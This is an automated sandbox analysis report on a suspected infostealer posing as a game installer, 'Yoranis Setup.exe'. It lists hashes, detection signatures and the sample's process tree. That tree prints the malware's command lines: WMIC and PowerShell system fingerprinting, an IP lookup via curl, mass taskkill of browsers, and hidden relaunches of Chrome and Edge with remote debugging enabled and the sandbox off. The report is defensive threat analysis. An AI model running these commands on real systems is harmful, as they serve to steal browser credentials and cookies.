
Windows Analysis Report
Yoranis Setup.exe

Overview

General Information

Sample name: Yoranis Setup.exe
Analysis ID: 1584251
MD5: b3cbd672cb20b2112488d26a6b325e69
SHA1: c752f280a123a30177ba1e17d770bead2c0644a9
SHA256: 9bdec941d05ba0c0f365e2198600914d6001745cf554b8e6673d5045b7f6205d

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Drops large PE files
Excessive usage of taskkill to terminate processes
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64native
  • Yoranis Setup.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\Yoranis Setup.exe" MD5: B3CBD672CB20B2112488D26A6B325E69)
    • cmd.exe (PID: 8056 cmdline: "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq YoransSetup.exe" /FO csv | "C:\Windows\system32\find.exe" "YoransSetup.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 3656 cmdline: tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq YoransSetup.exe" /FO csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • find.exe (PID: 1796 cmdline: "C:\Windows\system32\find.exe" "YoransSetup.exe" MD5: 31D06677CD9ACA84EA2E2E8E3BF22D65)
  • YoransSetup.exe (PID: 7488 cmdline: "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" MD5: 19A61DB800E68F1BCB442D9B2531E6BC)
    • cmd.exe (PID: 3392 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 6588 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • YoransSetup.exe (PID: 4672 cmdline: "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1664 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 19A61DB800E68F1BCB442D9B2531E6BC)
    • cmd.exe (PID: 4592 cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • curl.exe (PID: 4840 cmdline: curl http://api.ipify.org/ --ssl-no-revoke MD5: 1C3645EBDDBE2DA6A32A5F9FB43A3C23)
    • cmd.exe (PID: 1504 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • WMIC.exe (PID: 3664 cmdline: wmic bios get smbiosbiosversion MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 900 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • WMIC.exe (PID: 3960 cmdline: wmic MemoryChip get /format:list MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
      • find.exe (PID: 6000 cmdline: find /i "Speed" MD5: AE3F3DC3ED900F2A582BAD86A764508C)
    • YoransSetup.exe (PID: 7280 cmdline: "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --mojo-platform-channel-handle=2404 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 19A61DB800E68F1BCB442D9B2531E6BC)
    • cmd.exe (PID: 564 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • WMIC.exe (PID: 1648 cmdline: wmic path win32_VideoController get name MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 6464 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 5652 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6592 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 5672 cmdline: taskkill /IM chrome.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 6704 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 7332 cmdline: taskkill /IM msedge.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4424 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 4916 cmdline: taskkill /IM brave.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 7592 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 1608 cmdline: taskkill /IM firefox.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 3348 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 5440 cmdline: taskkill /IM opera.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2556 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM kometa.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 4632 cmdline: taskkill /IM kometa.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 7852 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 7456 cmdline: taskkill /IM orbitum.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 7764 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 7564 cmdline: taskkill /IM centbrowser.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 7328 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 4840 cmdline: taskkill /IM 7star.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5480 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 4912 cmdline: taskkill /IM sputnik.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5368 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 816 cmdline: taskkill /IM vivaldi.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 572 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 4132 cmdline: taskkill /IM epicprivacybrowser.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 6880 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM uran.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 6532 cmdline: taskkill /IM uran.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 6000 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM yandex.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 2476 cmdline: taskkill /IM yandex.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 1820 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 5072 cmdline: taskkill /IM iridium.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5652 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq msedge.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 3692 cmdline: tasklist /FI "IMAGENAME eq msedge.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 6464 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq firefox.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 3644 cmdline: tasklist /FI "IMAGENAME eq firefox.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 5816 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq chrome.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 2504 cmdline: tasklist /FI "IMAGENAME eq chrome.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 4432 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 7748 cmdline: tasklist /FI "IMAGENAME eq iexplore.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 1652 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 552 cmdline: tasklist /FI "IMAGENAME eq iexplore.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 6604 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 5540 cmdline: taskkill /IM chrome.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 8172 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 1920 cmdline: taskkill /IM msedge.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5964 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 2556 cmdline: taskkill /IM brave.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 1260 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 8060 cmdline: taskkill /IM firefox.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4320 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 7328 cmdline: taskkill /IM opera.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5440 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM kometa.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 4608 cmdline: taskkill /IM kometa.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 3412 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 7444 cmdline: taskkill /IM orbitum.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 284 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 1476 cmdline: taskkill /IM centbrowser.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4472 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 2040 cmdline: taskkill /IM 7star.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 3544 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 6060 cmdline: taskkill /IM sputnik.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4400 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 4728 cmdline: taskkill /IM vivaldi.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 1740 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 6204 cmdline: taskkill /IM epicprivacybrowser.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 572 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM uran.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 3528 cmdline: taskkill /IM uran.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5992 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM yandex.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 8012 cmdline: taskkill /IM yandex.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2708 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 1744 cmdline: taskkill /IM iridium.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • chrome.exe (PID: 8092 cmdline: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000 MD5: BB7C48CDDDE076E7EB44022520F40F77)
    • cmd.exe (PID: 1472 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq msedge.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 4104 cmdline: tasklist /FI "IMAGENAME eq msedge.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7976 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq firefox.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 6876 cmdline: tasklist /FI "IMAGENAME eq firefox.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 3260 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 4652 cmdline: tasklist /FI "IMAGENAME eq iexplore.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 3128 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 5616 cmdline: tasklist /FI "IMAGENAME eq iexplore.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 2096 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq chrome.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 2728 cmdline: tasklist /FI "IMAGENAME eq chrome.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7756 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 6004 cmdline: taskkill /IM chrome.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • msedge.exe (PID: 4644 cmdline: "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000 MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
      • msedge.exe (PID: 4960 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,3448241921201964185,6892278070021911797,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2412 /prefetch:3 MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
    • cmd.exe (PID: 2940 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 3180 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 2040 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 7672 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7432 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 6908 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
